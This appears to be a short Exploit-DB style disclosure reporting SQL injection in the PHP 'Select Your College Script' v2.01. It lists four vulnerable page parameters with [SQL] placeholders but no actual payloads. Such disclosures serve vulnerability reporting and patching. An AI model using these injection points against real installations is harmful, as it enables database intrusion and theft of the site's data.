21 lines
No EOL
752 B
Text
21 lines
No EOL
752 B
Text
# # # # #
|
|
# Exploit Title: Select Your College Script v2.01 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 06.03.2017
|
|
# Vendor Homepage: http://www.phpscriptsmall.com/
|
|
# Software : http://www.phpscriptsmall.com/product/select-your-college-script/
|
|
# Demo: http://schoolcollageerp.com/selectyourcollege/
|
|
# Version: 2.01
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/searchresult.php?institute=[SQL]
|
|
# http://localhost/[PATH]/searchresult.php?namesearch&name=[SQL]
|
|
# http://localhost/[PATH]/searchcourse.php?categoryid=[SQL]
|
|
# http://localhost/[PATH]/collegedetails.php?id=[SQL]
|
|
# Etc...
|
|
# # # # # |